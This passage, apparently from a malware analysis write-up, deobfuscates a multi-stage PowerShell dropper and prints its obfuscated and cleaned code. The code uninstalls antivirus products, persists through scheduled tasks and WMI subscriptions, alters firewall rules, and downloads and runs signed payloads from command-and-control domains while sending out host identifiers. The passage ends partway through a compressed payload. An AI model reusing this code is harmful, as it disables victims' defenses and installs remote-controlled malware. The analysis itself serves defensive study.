qfh+qfhschtasks /create /sc MINUTE qfh+qfh/mo 60 /tn pgOqfh+qfhKv1tnfxJyKv1tnpgO'+' /F /tr pgOpo'+'qfh+qfhwershell -w hidden qf'+'h+qfh-c PS_CMDpgO

}

start-sleep 1

Kv1folqfh+qfhder=Kv1stsrv.Gqfh+qfhetFold'+'er(pgOxJyKv1tnfpgO)

Kv1taskitemqfh+qfh=Kv1folder.GetTqfh+qfhasks(1)

qfh+qfhforeach(Kv1tas'+'k in Kv1taskitem){

foreach (Kv1qfh+qfhaction in Kv1taqfh+qfhsk.Definition.Actionsqfh+qfh) {

qfh+qfhqfh+qfhtry{

if(Kv1actqfh'+'+qfhion.Arguments.Contains(pgOPS_CMDpgO)){

Kv1'+'foqfh+qfhlder.RegisterTask(Kv1task.Namqfh+qfhe, Kv1task.Xml.replaceqfh+qfh(pgOPS_CMDpgO,Kv1tmqfh+qfhps.replace(fEHU1fEH,Kv1u.substring(0,5)).replace'+'(fEHU2fqf'+'h+qfhEH,Kv1u.substring(5))), 4, Kv1null, Kv1null, 0,qfh+qfh'+' Kv1null)fG9out-nqfh+qfhull

}

}ca'+'tch{}

}

}

starqfh+qfht-sleep 1

sqfh+qfhchtasks /ruqfh'+'+qfhn /tn pgOK'+'vqfh+qfh1qfh+qfhtnfxJyKv1tnpgO

start-sleep 5

}

}

tr'+'y{

Kqfh+qfhvqf'+'h+qfh1doiqfh+qfht1=Get-Wqfh+qfhMIObject -qfh+qfhClass __Eve'+'ntFilter -Name'+'Space fEHrootxJysubscriptionfEH -qfh+qfhfilter pgOName=fEHb'+'lackballfEqfh+qfhHp'+'gO

}caqfh+qfhtch{}q'+'fh+qfh'+'

if(-not qfh+qfhKv1doit1){

Set-WmiInstance -Class __EventFilter -NameSpace pgOrootxJysubscriptionpgO -Arguments @{Name=pgOblackballpgO;EventNameSpace=pgOrootxJycimv2pgO;QueryLa'+'ngu'+'age=pgOWQLqfh+q'+'fhpgO;Qu'+'ery=pgOSELECT * FROM __Instaqfh'+'+qfhnceModificationEv'+'ent W'+'ITHIN'+' 3600 Wqfh+qfhHERE TargetInstance IS'+'A fEHWin32_Peqfh+qfhrfForqfh+qfhmatte'+'dData_PerfOS'+'_SystemfEHpgO;} -ErrorAction Stopqfh+qfh

foreach(Kv1u iqfh+qfhn Kv1us){
qfh+qfh
Kv1theNam'+'e=getRan

Kv1wmicmd=K'+'v1tmps.replace(fEHU1fEH,Kv1qfh+qfhu.substring(0,5)).'+'replace(fEHU2fEH,Kv1u.substring(5)).replace(fEHa.jspfqfh+qfhEH,fEHaa.jspfEH)

Set-WmiInstance '+'qfh+qfh-Class __Filqfh+qfhte'+'rToConsuqfh+qfhmerBinding -Namesqfh+qfhpace pgOrootxJysubscriptionpgO -Arguments @{Filter=(Set-W'+'miInstance -Class __EventFi'+'lter -NameSpaceqfh+qfh pgOrootxJysubscriptionqfh+qfhpgO -A'+'r'+'gumeqfh+qfhnts @{Name=pgOfpgO+Kv1theName;EventNameSpace=pgOroot'+'xJycimv2pgO;Quqfh'+'+qfheryqfh+qfhL'+'anguage=pgOWQLpgO;qfh+qfhQuery=pgOSEqfh+qfhLECT *'+' FROM __InstanceMo'+'dificqfh+qfhatio'+'nE'+'vent WITHIN 3600 WHERE Tar'+'getInstan'+'ce ISA fEHWin32_PerfFormattqfh+qfhedData_PerfOS_SystemfEHpgO;} -ErrorAction Stqfh+qfhop);Consumer=(Set-WmiIq'+'fh+qf'+'hnstance -Class CommandLineEv'+'entConsum'+'er -Namespace pgOrootxJysubscriptionpgO -Argumen'+'ts @{Name=pgOcpgO+Kv'+'1theNam'+'e;ExecutablePat'+'qfh+qfhh=pgOc:xJywiqfh+qfhndowsx'+'Jysy'+'stem32xJycmd.exepgO;CommandLineTemplate=pgO/c powersqfh+qfhhell -c Kv1wmicmdpgO})}

'+' start-sleep 5
qfh+qfh
}

Set-Itemqfh+qfhProper'+'ty -Path pgOHKLM:xJySYSTEMxqfh+qfhJyCurrentC'+'ontrolSetxJyServicesxJyLanmanServerxJyParameterspgO DisableCompressionqfh+qfh -Type DWORD -Value 1 ???Force
qfh+qfh
}

cmd.e'+'xe /c netsh.qfh+qfhexe '+'firewall add portopeningqfh+qfh tcp 65529 Sqfh+qfhDNSd
qfh+qfh
'+'netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53

netsh advfirewall firewall add rule n'+'ameqfh+qfh'+'=pg'+'Odeny445pgO dir=in protocqfh+qfhol=tcp qfh+qfhlocalport=445 action=blo'+'ck

netsh advfirewall firewall addq'+'fh+qfh rule nam'+'e=pgOdeny135pgO dir=in protocol=tcp locaqfh+qfhlqfh+qfhport=135 acqfh+qfhtion=block

schtasks /delete /tqfh+qfhn Rtqfh+qfhsa2 /F

'+'schtasks /delete /tn Rtsa1 /F

schqfh+qfhtasks /delete /tn Rtsa /Fqfh).RePlacE(([Char]75+[Char]118+[Char]49),qfh9N0qfh).RePlacE(([Char]102+[Char]'+'69+[Char]72),[STrINg][Char]'+'39).RePlacE(qfhf'+'G9qfh,[STrINg][Char'+']124).RePlacE(('+'[Char]120+[Char]74+'+'[Char]121),qfhh83qfh).RePlacE(([Char]90+[Char]111+[Char]87),[STrINg][Char]96).RePlacE(([Char]112+[Char]103+[Char]79),[STrINg][Char'+']34)'+' )

').rePlacE(([cHAr]113+[cHAr]102+[cHAr]104),[StriNG][cHAr]39).rePlacE('9N0','$').rePlacE(([cHAr]104+[cHAr]56+[cHAr]51),[StriNG][cHAr]92)| .( $sHELlid[1]+$shElliD[13]+'X')

We got some familiar looking code but still its obfuscated, so lets deobsfucate the code again and clean it a bit

Stage 3

The cleaned Code we got with us is ⬇️ this, I added few comments as well,

# This block is checking for various AntiVirus products like Eset, Kaspersky, avast, avp, Norton etc and uninstalling them.
#-------------------------------------------block1--------------------------------------
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
#-------------------------------------------block1#-------------------------------------------

$v="?"+(Get-Date -Format '_yyyyMMdd')

# A Powershell command that will be used later, 
$tmps='function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url="http://"U1"U2"/a.jsp"+$v+"?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");a($url)'

# Checks if the current PowerShell has Administrator Privelages
$sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

# Generates a Random String
function getRan(){
	return -join([char[]](48..57+65..90+97..122)| Get-Random -Count (6+(Get-Random)%6))
}

# Array containing Domains, maybe C&C(Command and Control) server domains. 
$us=@('t[.]zz3r0[.]com','t[.]zker9.com','t[.]bb3u9.com')

# Creates Schedule Service object, Which could be used to view Scheduled tasks
$stsrv = New-Object -ComObject Schedule.Service
$stsrv.Connect()

# Checks if a task with name "blackball" is scheduled or not
try{
	$doit=$stsrv.GetFolder("\").GetTask("blackball")
}
catch{}

# If "blackball" is not scheduled
if(-not $doit){
    
    # Check if administer privelages, if schedule the task and run it as system user
	if($sa){
	    schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
    # otherwise schedule it as normal user
	else {
		schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
    
    # for each domain the array of domains,
	foreach($u in $us){

		$i = [array]::IndexOf($us,$u)
		
        # Generate Random task name
		if($i%3 -eq 0){$tnf=''}
		if($i%3 -eq 1){$tnf=getRan}
		if($i%3 -eq 2){
			if($sa){
				$tnf='MicroSoft\Windows\'+(getRan)
			}
			else{
				$tnf=getRan
			}
		}
		$tn = getRan

        # If admininstrator privelages, then schedule a task to run PS_CMD powershell script as system user
		if($sa){
			schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -c PS_CMD"
		} 
        # Otherwise Schedule task as normal user
		else {
			schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
		}
        # Sleeps for 1 second
		start-sleep 1
		
        # Gets all the task created earlier into array.
		$folder=$stsrv.GetFolder("\$tnf")
		$taskitem=$folder.GetTasks(1)
		
        # For each task that were created, replace the PS_CMD command with the tmps variable set earlier, and Replace U1 and U2 with the domains that were declared earlier
		foreach($task in $taskitem){
			foreach ($action in $task.Definition.Actions) {
				try{
					if($action.Arguments.Contains("PS_CMD")){
						$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null
					}
				}catch{}
			}
		} 
        # Sleeps for 1 second		
		start-sleep 1
		
		schtasks /run /tn "$tnf\$tn" 
        
        # Sleeps for 1 second	
		start-sleep 5
	}
}

# Checks if an event with blackball exists or not
try{
	$doit1=Get-WMIObject -Class __EventFilter -NameSpace 'root\subscription' -filter "Name='blackball'"
}
catch{}

# if blackball event doesnot exist, then create the event
if(-not $doit1){
	Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="blackball";EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop
	
    # and add the task to run powershell script tmpfs declared earlier
	foreach($u in $us){
		$theName=getRan
		$wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp')
		
		Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=(Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="f"+$theName;EventNameSpace="root\cimv2";Qu'+'eryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop);Consumer=(Set-WmiIqfh+qfhnstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="c"+$theName;ExecutablePath="c:\windows\system32\cmd.exe";CommandLineTemplate="/c powershell -c $wmicmd"})}

		start-sleep 5
	}
	
	Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 ???Force
}
# This block adds some firewall rules
#----------------------------------------Block2----------------------------------------
cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
#----------------------------------------Block2----------------------------------------

# This block deletes scheduled tasks with name Rtsa, Rtsa1, Rtsa2
#----------------------------------------Block3----------------------------------------
schtasks /delete /tn Rtsa2 /F
schtasks /delete /tn Rtsa1 /F
schtasks /delete /tn Rtsa /F
#----------------------------------------Block3----------------------------------------

Let’s understand what this code does,

The First block is checking for presence of various AntiVirus products like Eset, Kaspersky, avast, avp, Norton etc and uninstalls them.
Then a variable tmps is initialized with some powershell code
Then it check if the powershell is running with administrator privelages.
There is a getRan function which generate a rnadom string
An array with some domains is initialized, possibly these domains are C&C servers used to deliever more payloads
Then it checks if a task with name “blackball” is present,
If the task is not present then, it creates a scheduled task with system privelages(if powershell running with administrator privelages) else with user privelages
The task scheduled earlier runs a PowerShell script stored in tmps variable, this script is our next stage of payload.
Then the code checks if there is a event with the name “blackball” is present,
If the event isn’t present, then it creates an event, which runs the same tmps powershell script
Then there is block 2 which adds some firewall rules to open ports on the system
Lastly there is block 3 which deletes some scheduled tasks with the name Rtsa, Rtsa1, Rtsa2

Let’s move to the powershell script in the tmps variable which is our next stage

Stage 4

function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url="http://"U1"U2"/a.jsp"+$v+"?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");a($url)

Let’s Clean up and format this code

function a($u){
	$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());
	
	$c=$d.count;
	
	if($c -gt 173){

		$b=$d[173..$c];

		$p=New-Object Security.Cryptography.RSAParameters;

        $p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");
		$p.Exponent=0x01,0x00,0x01;
		
		$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
        $r.ImportParameters($p);
		
		if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){
			Iex(-join[char[]]$b)
		}
	}
}

$url="hxxp[://]t[.]zz3ro[.]com/a.jsp?__preex_20210425?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");

a($url)

Let’s Try to understand what this code does,

We have a funciton with name as “a” and it takes a parameter “u”
Then this function downloads a file using the parameter u passed which is an url
This function checks if the data downloaded is of more than 173 characters, and if it is, then a variable b is initialized with the data from the offset, i.e. data[173:]
Then it is creating an RSAParameters Object, and then modulus and exponent are set to the RSAParameter which would be used later.
Then it is creating an RSACryptoServiceProvider Object, Which would be used later to encrypt and decrypt data, this object is then importing the RSAParamter object it created earlier
This RSACryptServiceProvider object is then used to verify digital signature of downloaded data, and if succeds, the data is run using powershell by Invoke-Expression or IEX command.
Lastly the function “a” is called by given the parameter “u” as "hxxp://t[.]zz3ro[.]com/a[.]jsp?__preex_20210425?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");

This script will result in downloading and invoking the script in “a.jsp” file, The file downloaded “a.jsp” is

lAgx9ARFV4laNRcwsoiT6Vg4tC/IoQR3WUbV38N0bcG+Jmj1EhfbYHneyTJPX5bDKSfycOWTQ+a6v39cIsB6ZEq+Uc9iDygwPFOBUDw6EUltgevVIK3VeZ8yFQPozvS00D/95rVZymbEDD7eeU1+mDr4Ku6AyxyQhIo0G1ucUnM=
IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7dfeb60796f96a69f7d6f3a3f7ef5bdef7f3ffd28bd73e7d37bdf7f95cda7df1b7dfce6eaf4e3f4f4e4f8f92aafb7d387f6f3b3c54ff1e7e5cbfcd5c9769adef9f8374e7ee324bd93ded97b486dbe4d6dee3cfc547efbe4defd8f3ff9d8fcbebbfbfd57f427fed84a4fa7c7e5ea9420efdf93efe99b11c13efefc3bf42f7dfbfce5693dddfed4c2dca1067bbbdfa77f05dc01fdb6afa0777676e5b72d7d91bea37715b2c3873efe64e7be79e981bea3b8d09766a07889b078ba772ab828a67bda0b21b3abbf3244d3fb270f0e4290f5f69d336ab1f82990e8374e686cabe6a7c76d5d114def96f5faf7cfeb6a7abaf78cbe487fefd3b3d768742f6d66cb6a9abfde4e57795ebede26143ea1ffb775d672835fc2fffce2f9b4cd30ccf497fc187ff063e607ffbcd3e4edf5e4f7bfca6a02fffdef7fafc6e42d0b7aa1fae9ed2d744650e92ffa71f663face2fa6f9bfceeafa18afd26ba3dd6cdee0a7838539a0ff3fdbcadaece9f57951e797e3ac411f5be78582a9f3597159d52ff329b52c2eebfc75d5aeaeeb93dd63fafbdbafc7d7f355565fc867e3ebb6a875806b1af37891eb5fd4b6a5ff37d7afd3769afff4e4cbedabfc45fa59aa389961ee7f9a371921cb485d2cd163ddbee64f9f2caafad9a347df6f094922e8f7e8657f7421a1961745a33d2bc1c0a944b3ad654114a37709a636e00ef9779e5b8144bf02d822abb397a00828f56caba9f336c767faea4bccfde24c69a6281c3a8a815cf4a652ecf8f5ab3eb5944c2d2843a05fe42b857dfd663b2495e9d4ef6b77e7ddce6807ffe0376ad42ecdb096d5eadde91834d741e8e7dedbb3fbf4e2e453fae7c13efe99d03f07f7e89fcc00c1a70fe99f3c43cb07f4cf3e7ebb87770e0ef0ed39fd737f663e9be1cfbd07d42bf0dac577fcfa1efda3203f459373f4c2902778f700bf61863092c914efa2410e900ff1db397f86a67bc0343f7847ad0df04cbacbd07a179f3c008e3b68f81028cfa6d27a0ff8ece500675b6518c4010fec9e376674f72097d766f88309bd077a7d8a3fefe18d9d7bd2f1c35df9b93b73102618f10cad26960007a0ef145852fb1c78ece1bb3d26218f9227001841d630da1d1e137edb05f2423b0cec53203f43fb1cdf66408ac9f5a992f20110fe14b07680c51ebe9b7027fb32ac7b8025934f1fd3473c50f373b4837f667881473dc56ff7308a9c2700dd7f8a9e1f30e05cdebccf0c85fe78988c10932a0356f7ee9b3fcf791c7b4236fa030809ede8b79f1aed01ed195e79c8c4c37bbbe8760680538c5a78877f53a2331f01adfb6894cd18239288665dae67d517631103305943ff78526085fa250ba8d30422aad05c24adf4a32fb09e7cd2f79fe11fa73200e86356c9dc156b14d20edf6f97eb6a3a163dd5e440643cbef76017b6c7ff10a8ebd03cdd2f98e143a36dbebffb60773cdef99ebc6b74840561d5a11bf02fbe43dda5ed05e9971e2aacf75991923d2bb365718e4e05285b89595695cbabeae998344d514e27f995df910051dbc5360d064d00de794ab8ef9d6e93191ed1ff4fefff22854b7f6ce5d3ac349a2fafc76fa7eba7bfffb25ae4cf09dc27644fb7f1c9367f427f8de8ffd4ffc5f1769d375fd11f5bb35936a6899c65f9b7c70ac647d08cfcba6e7fecc7f47b35e1e006ccd94a0c373afb3df4279140ad39cfae471101c73dbcdb999d4cf2ef8e5b6202e207fa9359827eb2d60eb1b0483045f85fe9e4fb174bb274cdf7f8a32de621fe354d7f31bb12e9b22adae9727dce2f124abf90fecfb60c7f3c1cef802ab04684e9aa8095cf173ace6cb96af1c1aa5894f879fefb9f2fc1d553316ac48f67df1be5227a68bf28da1550320abb9e2ff475fcb85c9ceae7f407fa36787cffbe7e3e1eef7ccffc3e5b4070dea2dfad4e6b6aa68dbe777fb658749ae857d492dee7c6dfd38fa8f17981d6862b47702c8a459d6306bf6f265f7f626cf4cdef4f4dd62bf866a345be308313e99cd5ec7809cdb2a536cb2f8bdae873fcbd2cb24535c36fc4726bef8bfd4f1bd05bc8d854ea4a901fb1f57b6e81897e21013ffe9cfef9ce679f90723044657ef3c4e497907cec61461e8e1f8ee507fd2b22a3ef406a0ec6fc9f7e02c9f93db7a0cef259fde57c5a67f96b728fc8477bfde2694b7aea4ebeaedbcf667939c996f9aa4849d595c5f936735356af2f0a6285297db8ca66d9dbbaba6af3e5efbf776f595ca54d939553f540aa6271b5dde6175b605de7b3a6f4e017cc7096d793541f7cf6fdbdefe54b9e26c800f12533a5dfe217dfb9332b88339909d35f946fa7dfdfdd362f6da5b365b69d821d9e9e7efbf5d9f327c76f5e9f42d01b9a8896901e83a7495b113482900a42f97a59e0cbf417e3b33b65b95ebaf9e03ee40fb0baed89fe603002039c421fffe2f4f74897b3ef624e5250b92dac7a82c2e0de6964f0ee749876584b426035e506cb226534e753a24fc5b22b0cfe9925093e7b79f20658ac2a8cb9a5b8a065d5e100b1d0ff1274460cda34f9b4aa57e3dfdf0d6d342bf0e7336225c360e88f06b00bc06d5363d28d68f0946ed38f326fa8c98588014b4b315bb29fdfe44fb75392044c1dda689fda6cbb75da827e12637c96e303a369785e95bb53566cafab3704a29ecd8e5f9e31a669359fe6bf3855c280d43cd90b9ad85ff416ecffe964bce2f9cef5c51674afbedde69f5310d02c9f42e14250c4147fef33566fcc4ce87759353f8d79a2ffeffedebff7ef7da19833bf93e5d919ef5ed28fb2348eee9ce4e6aa7ad95c55b365f15dfa6aef1e036ee857f9f08a7e7b344de7d036d96abb2583f719ab52d04b474bb344ccb20d8ef924b7b2be64a3f8097d888066f65d23f1bfe417dfd9ddcacb627e7578670bf160338695a636870ff7eedffff4fb75be241c8ae7abe91b76e4dbfcedb47a8d5f55bd311fbf606f04246804134829d3f7a9551d5be9aa6dace4deb90345c758e9f7e96475b1f5c99d6531a9df627648c9ca2ffbf98c43daf47c7ab1c550d485805effbdca6c0a4bc272c46284efec2b70eb4ec90e9e29dfd7bf174ca9171152bb8bcf4c73a757d45d008ee02ef6642c834ee8a30b68f0343328cb9f84b2fc72af8fb2e27cb1fce20d50667cc9d1c1a7da9aa012c28c2d7f7cac1d7efe1dbcc47833b606b809117ff11dd5ffaab032f9a3ae48c7f2af5bd4d1c7e2fac9e8e80f6f8039e888373e862299c8c0e877d8711d9e8e4e11c29cf3277b83c3b4a36469d8e217f1d64fe990ed9bfe78c9e8fae3441b375153fd5506ee8d7aeb9cbe2dece03cc6721c75ce14711e81fcbddb415fbfb6fc757ee6cd143eb22fbcf379eafccce10c59c76f0e6f9fad4818aca9154bfb4909570e7269bafafe795e7f0f6656fee71a80c9a9cdf31c4a239b54e5e7d26204fb0a1cdfe5edfa8b31e93af240ebf91b1719d09b2f0e297d010880f65900d7740c91a53f65ec1fb3ed42932d1e58e0fb99b18892817c10c54ff79eb17a99d1dfdfbdb3643a7ddf66899022fabd4f39c89a9dc1a089cd143a7b8a44006dd1c4718f4a4674ec3330d13b7f978fa93130247afceeab45fbbba7bf308d7d5ad495ff9982e4afaeefa6d72b32d5d3bbe96c31fd85e9762a08689b676412e08663ae7ee1eff7fbfd7e2036a1e154da2f7c6ac2065612d08a77a401bda92fc81fb621b5324d0ae48c38687972fa721be4d885463fbc7387d27f1c175132941cbe65f68a3c9fcfe10a3cd8a3380ba1fed6d627bfbf0018add8992423451f13a8b2a47414c4bdfe2e192952edcfc65f9e19f57ce8f88a06165246c78401db56fad92744ad4797500f39d8477a2483912fabf2642c787ca6f81cea3b34087e76b77884c493afc677eedc81255d9189cd9f023b0a8a699af53382c4bf0377fef3cbb3ef799a231dddb9f3fd3b122e0a7b6d8dc777763f611df03df96444614b5ec33cbebeae2950fbc28d9dc40193f4d38a9e84cc5b29b77fbd2a7ef03966cf22a3ad18897ea4bdc551deabeb3ae3fce7136a64bed517d1e83325c89def0345840f1af3b07d0d65e31d82b6e2f097fc92b70a00ceec2fbe0391dd912c027ba700f43d6bee492b91f9fe8c2970b8bbede2722212fd6ee994b6e576ca8d763e13a5c47e082090e303d6548527dc4fdf5388227cb195a92406b20f0e563c3dd1784a52c27c8e412aabf74501ea219006fae397fcfe6439c143f755351ffefe4b1e003e9331fce23bab7505dda06e9f604014f8258ac82fd9fd4c5bfce2bcc167d2a2cc7f892aa3d18a410b3b96a56177121691146aafc2f2b1f5e87ef11d8311911ff225543f54bac2de7f86cf0e310a15ac8f9180a17f349e8730fd1ef89ce989bfee5ac1c248f055090bbcfefd29a781e84e3143aa63a6a98ed9f84e10e83ba98885fc5b5d9afdaea0131188de3034f207a6d4c7c07e7f7f64bfff7d7a81bf3aa45fee84f43b8604f435cc670ae1176b737256d553050e8d0bdcd365bd6e59d60f7f89526fef9dfcdc32fe3abbe914b29e4a58a1f104e653c1009f79937d9b75df9a94c6c7489191626aa9f1096177ffe9171bf3dd34c3aa4b3062cbe94689019f8f11feca2cd11439f991c9a20935b8042af3336e2d6d3cad6b9980142e7f645e16154bfa15dd918a1531702ff23438c5ec2445f0fb443d13b450bf1b3a82fe6f649b7b1e3198113776ea02531f33f1640a887098c4e95db8381cfe14cf891317eb8bfa789bcd2d194ecc31b29a6085ed54e2b497dbbcbac49d33101d28541f01aae6db10bc2b17b252a38f45abad8cd96f8092fe6e31337402078987a0f3013786ec2487188abd4b504d331e387bb0a2188af505938214ddef0f83843f2ed1fdef0931e114aa498f7c7ff77b080c9192e320bc194bc2ecb34b6d40a2254e372514902ef8e298d8745991917805bac1e35b6ca794e4614e5367925e5a7a2f9d9ebcfaf2d929acfcf1d9d3b39f7c41bffcde6f3e3fe6b54b0ccf408148426a0cac8fd9f9d5463695439f1ac588be304afd933de320fca4b8d37ce7859ffa51240a25d81a88ea54c36aaecbe93b7208f329b9de39b9b02f8d37fdc53605ce669a4d3fc437e8b841c0ab9fad1c4efa89a076bb90d862a2efc610624c98214d189d4550071f078d77397d50b5c5b2fa22a7c4646957a65e21a7d5144ff55d3338ed8c725f36d7caf36d3cff8fd9fd83359495c0326b0ddaed9834574d1a6d3ea6fc08584c329f36d7811fde6caf8a311b4acc095901646bcc8b922b45c7ec75140d1656f5bb4bf315127e903af264168b757377f7eec34f3fbdb7ff6877bc43ff91b779f7eea3550b7f6a0e741d374aaa98ac137dc5068abe1a5b1b855c33e54696d63255d62f82815a6e6d89b794ffa028335af1a554cff84e6dfe7addae8a7afa3abbccbe038fb0cdcce763f9624c16d077c6284d25e3e21111228d4b0de9d82987410b91b09ca2f621c958e924b846d950b67bde16dfa5213d27bb715d4e0083123fc78c0325aacef357581fe94c297dc2b30a4d03d144c0202ae7977c7fe77b77ee882d6b7809679cafaedf5052d7f4f894eddb96fe098ffcf787f78df7809c7c6b0c1fe7a77e09ab8abd7b6f8e7949e017c1ee215db7a8ab67c8162b448efdd1f2f5b3372fe8c7c7ea3f860d3fe6d0dca439d15cd2af2f3e46b6d84257a42d6c281f050ffebf2437fb9534e7817c0cabd279eb632ca573470cf1cefede8e2cfe9013b87a9de7f533402a8becf2d83617b4aee1653492affbc529c9e7fc0a845092a51a3afe143925e88b1373f4f6f7c94f3893de8d67d27c0f7c429f01fd99328b99c7c9e7bb7789fd15187ba292a23ffc2529390c8464762229c3cf3e49a921273f7e71fa4bb0daad7ffee2df9d2748a20ea3c0b269d15ccf611a39a3fddd9492d8176a9beee4179444cea7bc3aff126c472250b11e33fcf152df421efc443f0c53a85f168bef2236dcda3a9545a2cf52b3d240ffe75504a3fe21606559d5949b3e21cb54fc2401ff18091f234b0614c1504be5bd0afed504ac24e7cd0cf8c9f90b2631af5f7c2c710e0b493323b594375073edd8e4b63d778e23ddb7d3e20dc91d7c8b65551764e1bfb7d5c0d0f1bb4559165fb077573fa356cb6cd540157f8ffbd3b522567505386c414b83d0b20ba3a831ffb5fe01cdc0aee2540602d9f8d866337faa4b0abbe672661d0db6205f1cbf7875fafa2b709b7a23207d6311a9a0707f723cc16acc332bda2434da0f32f0482660d2ac59fd2e63725e35553d2dbe38a63f6c731b2f411b81bcc49113562bd237f7c30a50341ca91db224f9ea4b10dcb111965330373c4ac3efe8d98c9711fed886770c926455ff94247e90bd67b697fc7836cdbe18d31a81e4a3d29f20a36a977dba129c3a53ddda0529590c3ae1c520c26176ac0a49e5c0f0a98faf3876c0f22954cf575f51a434a5c5f6faa589e1991c0412737e0248d4cc00ab7855e9635e3f00df8b53e826f8cd572fbff8f244fccd8f919e15fe360ea33138e41d64a4e48b65b1981df3b47d27fdbee9beac5e2dcf68c96bfd44e6593fffeeb8cc56c594acc34b0e4a20b314977c6f4b5e68380c25fbd13acfa25e9fc8d203b5a78f6767ea1759486ede5eda40e77bdfff188943edaafb866b47ad5845b66619d37ad1776544b2660a6e422ae38efbc2fac46b3129292f53fffe24de56051ccbb2cac33554ce64326ec5af98d3e79f892f